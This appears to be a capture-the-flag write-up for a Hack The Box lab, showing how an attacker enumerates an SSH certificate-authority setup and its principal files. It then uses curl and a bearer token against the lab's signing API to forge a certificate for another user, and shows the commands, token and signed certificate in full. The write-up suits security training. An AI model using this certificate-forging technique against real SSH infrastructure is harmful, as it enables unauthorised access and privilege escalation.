InfoSec LAB

Resource_auth_principals

Created: 4 min read

auth_principals

Upon gaining the initial foothold, I decided to look further into the SSH configuration as it seems to accept CA-signed keys

support@ssg:/etc/ssh$ ll
total 604
drwxr-xr-x   5 root root   4096 Jul 24 12:24 ./
drwxr-xr-x 100 root root   4096 Jul 30 08:45 ../
drwxr-xr-x   2 root root   4096 Feb  8 12:16 auth_principals/
-rw-------   1 root root    399 Feb  8 19:40 ca-analytics
-rw-r--r--   1 root root     94 Feb  8 19:40 ca-analytics.pub
-rw-------   1 root root    432 Feb  8 19:42 ca-it
-rw-r--r--   1 root root    116 Feb  8 19:43 ca-it.pub
-rw-------   1 root root   2655 Feb  8 19:03 ca-security
-rw-r--r--   1 root root    569 Feb  8 19:03 ca-security.pub
-rw-r--r--   1 root root 505426 Jul 19  2023 moduli
-rw-r--r--   1 root root   1650 Jul 19  2023 ssh_config
drwxr-xr-x   2 root root   4096 Feb  7 21:52 ssh_config.d/
-rw-r--r--   1 root root   3240 Feb  7 21:48 sshd_config
drwxr-xr-x   2 root root   4096 Feb  8 12:24 sshd_config.d/
-rw-r--r--   1 root root   3239 Jul 24 12:23 sshd_config.ucf-dist
-rw-------   1 root root   1369 Feb  7 19:37 ssh_host_dsa_key
-rw-r--r--   1 root root    959 Feb  8 19:44 ssh_host_dsa_key-cert.pub
-rw-r--r--   1 root root    598 Feb  7 19:37 ssh_host_dsa_key.pub
-rw-------   1 root root    505 Feb  7 19:37 ssh_host_ecdsa_key
-rw-r--r--   1 root root    531 Feb  8 19:44 ssh_host_ecdsa_key-cert.pub
-rw-r--r--   1 root root    170 Feb  7 19:37 ssh_host_ecdsa_key.pub
-rw-------   1 root root    399 Feb  7 19:37 ssh_host_ed25519_key
-rw-r--r--   1 root root    451 Feb  8 19:44 ssh_host_ed25519_key-cert.pub
-rw-r--r--   1 root root     90 Feb  7 19:37 ssh_host_ed25519_key.pub
-rw-------   1 root root   2590 Feb  7 19:37 ssh_host_rsa_key
-rw-r--r--   1 root root    923 Feb  8 19:44 ssh_host_rsa_key-cert.pub
-rw-r--r--   1 root root    562 Feb  7 19:37 ssh_host_rsa_key.pub
-rw-r--r--   1 root root    342 Dec  7  2020 ssh_import_id

There is the auth_principals directory. It should contain data defining the principals that was used during the key signing with the bash script

sshd config

support@ssg:/etc/ssh$ cat sshd_config | grep -v '^#' && cat sshd_config.d/sshcerts.conf
Include /etc/ssh/sshd_config.d/*.conf
Port 2222
 
PermitRootLogin yes
KbdInteractiveAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server
 
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
HostCertificate /etc/ssh/ssh_host_dsa_key-cert.pub
HostCertificate /etc/ssh/ssh_host_ecdsa_key-cert.pub
HostCertificate /etc/ssh/ssh_host_rsa_key-cert.pub
HostCertificate /etc/ssh/ssh_host_ed25519_key-cert.pub
TrustedUserCAKeys /etc/ssh/ca-it.pub
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
PasswordAuthentication no

sshd configuration shows that it’s configured to accept CA keys and AuthorizedPrincipalsFile set to /etc/ssh/auth_principals/%u

principals

support@ssg:/etc/ssh$ ll auth_principals/
total 20
drwxr-xr-x 2 root root 4096 Feb  8 12:16 ./
drwxr-xr-x 5 root root 4096 Jul 24 12:24 ../
-rw-r--r-- 1 root root   10 Feb  8 12:16 root
-rw-r--r-- 1 root root   18 Feb  8 12:16 support
-rw-r--r-- 1 root root   13 Feb  8 12:11 zzinter
 
support@ssg:/etc/ssh$ cat auth_principals/root
root_user
support@ssg:/etc/ssh$ cat auth_principals/support
support
root_user
support@ssg:/etc/ssh$ cat auth_principals/zzinter
zzinter_temp

The auth_principals directory contains 3 users with their respective principals This would mean that I can use these information to sign the key for both zzinter and root accounts

Signing

┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ./sign_key_api.sh ca-itrc.pub zzinter zzinter_temp
Error: 'zzinter_temp' is not a supported principal.
Choose from:
    webserver - external web servers - webadmin user
    analytics - analytics team databases - analytics user
    support - IT support server - support user
    security - SOC servers - support user
 
Usage: ./sign_key_api.sh <public_key_file> <username> <principal>

Doing so using the sign_key_api.sh script results in failure as it only contains pre-defined 4 principals. I would need to request it manually.

Manual Signing

┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ export public_key=$(cat ca-itrc.pub)
 
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ echo $public_key
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDoBD1UoFfL41g/FVX373rdm5WPz+SZ0bWt5PYP+dhok4vb3UpJPIGOeAsXmAkzEVYBHIiE+aGbrcXvDaSbZc6cI2aZfFraEPt080KVKHALAPgaOn/zFdld8P9yaENKBKltWLZ9I6rwg98IGEToB7JNZF9hzasjjD0IDKv8JQ3NwimDcZTc6Le0hJw52ANcLszteliFSyoTty9N/oUgTUjkFsgsroEh+Onz4buVD2bxoZ+9mODcdYTQ4ChwanfzFSnTrTtAQrJtyH/bDRTa2BpmdmYdQu+4HcbDl5NbiEwu1FNskz/YNDPkq3bEYEOvgMiu/0ZMy0wercx6Tn0G2cppS70/rG5GMcJi0WTcUic3k+XJ191WEG1EtXJNbZdtJc7Ky0EKhat0dgck8zpq62kejtkBQd86p6FvR8+xH3/JMxHvMNVYVODJt/MIik99sWb5Q7NCVcIXQ0ejVTzTI9QT27km/FUgl3cs5CZ4GIN7polPenQXEmdmbBOWD2hrlLs= ITRC Certifcate CA

I will assign the content of the CA’s public key to the $public_key variable

Signing zzinter with zzinter_temp

┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "zzinter", "principals": "zzinter_temp"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE" > zzinter-zzinter_temp.pub
 
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ cat zzinter-zzinter_temp.pub
ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAgt9lA0cgLYB+t/E5zOy+6VGg2xUUQkxS2MJ1AdwwIAKgAAAADAQABAAABgQDoBD1UoFfL41g/FVX373rdm5WPz+SZ0bWt5PYP+dhok4vb3UpJPIGOeAsXmAkzEVYBHIiE+aGbrcXvDaSbZc6cI2aZfFraEPt080KVKHALAPgaOn/zFdld8P9yaENKBKltWLZ9I6rwg98IGEToB7JNZF9hzasjjD0IDKv8JQ3NwimDcZTc6Le0hJw52ANcLszteliFSyoTty9N/oUgTUjkFsgsroEh+Onz4buVD2bxoZ+9mODcdYTQ4ChwanfzFSnTrTtAQrJtyH/bDRTa2BpmdmYdQu+4HcbDl5NbiEwu1FNskz/YNDPkq3bEYEOvgMiu/0ZMy0wercx6Tn0G2cppS70/rG5GMcJi0WTcUic3k+XJ191WEG1EtXJNbZdtJc7Ky0EKhat0dgck8zpq62kejtkBQd86p6FvR8+xH3/JMxHvMNVYVODJt/MIik99sWb5Q7NCVcIXQ0ejVTzTI9QT27km/FUgl3cs5CZ4GIN7polPenQXEmdmbBOWD2hrlLsAAAAAAAAAQAAAAAEAAAAHenppbnRlcgAAABAAAAAMenppbnRlcl90ZW1wAAAAAGan6T3//////////wAAAAAAAACCAAAAFXBlcm1pdC1YMTEtZm9yd2FyZGluZwAAAAAAAAAXcGVybWl0LWFnZW50LWZvcndhcmRpbmcAAAAAAAAAFnBlcm1pdC1wb3J0LWZvcndhcmRpbmcAAAAAAAAACnBlcm1pdC1wdHkAAAAAAAAADnBlcm1pdC11c2VyLXJjAAAAAAAAAAAAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIIHg8Cudy1ShyYfqzC3ANlgAcW7Q4MoZuezAE8mNFSmxAAAAUwAAAAtzc2gtZWQyNTUxOQAAAEBhvfLodL5393UlxYdin+2i2o7+ARE1TtWi2xxt36PhO4d6xF5DWVGdnRjCjEhfHjeErtLZmvWCXcCDgrKxgaAM ITRC Certifcate CA

Manually signing it via curl I will now use this newly signed public key with the CA private key to authenticate to the target system

Signing root with root_user

┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "root", "principals": "root_user"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"
{"detail":"Root access must be granted manually. See the IT admin staff."}

Attempting to sign for the root account failed It says that it must be granted manually.

Interactive Graph View

Backlinks